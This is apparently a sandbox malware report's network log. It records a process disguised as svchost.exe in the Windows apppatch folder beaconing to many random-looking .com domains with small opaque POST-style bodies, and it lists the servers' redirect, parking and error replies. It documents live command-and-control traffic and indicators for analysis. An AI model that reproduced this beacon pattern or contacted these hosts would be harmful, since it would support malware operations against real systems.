                                                                                                                                                                                                              Aug 23, 2024 18:48:24.434413910 CEST795INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:24 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrn%2Fv2RFc1UwZx%2BAnaUTFz%2F55b16MI9o9vBU%2BYZmDZEICXq30OzLvBREgf%2Bkp3XWuVQWBDrrXwwFCxjTWmM2Vaz02jJQ0zTpwna5e4bYsEjcNTk2VDbUsw8lUZS6qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c97069a315e70-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:48:27.689261913 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:28.798979044 CEST797INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:28 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FF2znX5BKFETzqc2l7IbL717hn3G7%2FerE5ndnIjkesya%2BnemsCuhn4T1aQwPf71l%2BJwCWSxiODPlDSSHaddlmJgp42IUs8uwUd8KMV3sLJ1N%2Bf7OVv%2FHhcewAfXhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c971d6b9b5e70-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              48192.168.2.46429118.208.156.248806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.810475111 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupycag.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431636|1724431636|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:24.316374063 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:24 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431704|1724431636|34|2|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              49192.168.2.464292103.150.11.230806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.943445921 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:24.867440939 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:24 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:48:25.990607977 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:26.313071966 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:26 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              50192.168.2.464294106.15.137.6680016720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:24.874914885 CEST295OUTGET /dh/147287063_637385.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.137.66:8001
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:25.988528967 CEST1043INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:25 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:25 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              51192.168.2.464295106.15.137.6680016720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:26.319967985 CEST295OUTGET /dh/147287063_637385.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.137.66:8001
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:27.443833113 CEST1043INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:27 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:27 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              52192.168.2.46429713.248.169.48806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:31.629614115 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              53192.168.2.46429844.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.702896118 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyciz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431658|1724431658|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.203397989 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431716|1724431658|29|2|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              54192.168.2.46429915.197.240.2080
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.714055061 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qexyhuv.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              55192.168.2.46430064.225.91.73806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.714438915 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galynuh.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.316200018 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              56192.168.2.464301103.224.182.252806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.018482924 CEST302OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: __tad=1724431658.5743798
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.638926983 CEST242INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              57192.168.2.464302103.224.212.210806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.029324055 CEST302OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: __tad=1724431658.5024510
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.648309946 CEST244INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              58192.168.2.464303154.85.183.50806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.049006939 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.973824024 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
